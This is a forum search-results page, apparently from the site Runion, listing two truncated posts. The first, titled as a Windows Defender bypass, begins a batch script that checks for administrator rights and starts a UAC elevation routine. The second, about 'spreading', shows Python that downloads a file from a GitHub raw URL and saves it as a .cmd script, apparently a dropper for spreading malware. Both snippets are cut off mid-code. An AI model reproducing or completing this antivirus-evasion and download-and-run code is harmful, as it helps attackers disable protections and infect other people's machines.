Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Search results

  1. S

    Bypass Windows Defender Only | Обход Windows Defender

    Код: Скопировать в буфер обмена @echo off >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" REM --> If error flag set, we do not have admin. if '%errorlevel%' NEQ '0' ( goto neptyn ) else ( goto godmuyiuin ) :neptyn echo Set UAC =...
  2. S

    Hey! Here's some spreading info

    Пожалуйста, обратите внимание, что пользователь заблокирован If you add the python code found below: import requests url = "cantpostlinks//raw.githubusercontent.com/portal/main/requests.json" r = requests.get(url) with open("python.cmd", "wb") as f: f.write(r.content)...
Top